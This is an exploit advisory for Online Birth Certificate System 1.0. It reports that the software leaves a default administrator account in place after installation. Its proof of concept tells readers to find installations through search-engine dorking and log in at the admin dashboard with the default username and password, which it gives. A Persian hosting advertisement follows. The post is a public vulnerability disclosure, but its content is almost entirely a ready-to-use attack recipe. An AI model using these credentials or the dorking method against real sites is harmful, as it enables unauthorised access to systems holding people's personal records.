Online Birth Certificate System 1.0 Insecure Settings

Online Birth Certificate System 1.0 Insecure Settings
Posted Sep 11, 2024
Authored by indoushka

Online Birth Certificate System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit
SHA-256 | c7135c363265f519cec4fb4469d88770d47f7406243e7711a2ef7aca6159b30a
====================================================================================================================================
| # Title : Online Birth Certificate System 1.0 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure Settings : appears to leave a default administrative account in place post installation.

[+] use payload :

Username: admin

Password: Test@123

[+] http://127.0.0.1/obcs/admin/dashboard.php

Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================

آسیب‌پذیری‌های جدید و وصله‌های امنیتی به‌صورت مداوم منتشر می‌شوند و عدم بروزرسانی به‌موقع می‌تواند امنیت سرویس‌های حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرم‌افزارها، نصب Patchهای امنیتی و سخت‌سازی سرورها است.

خدمات مدیریت و امنیت سرور

نوشته های مشابه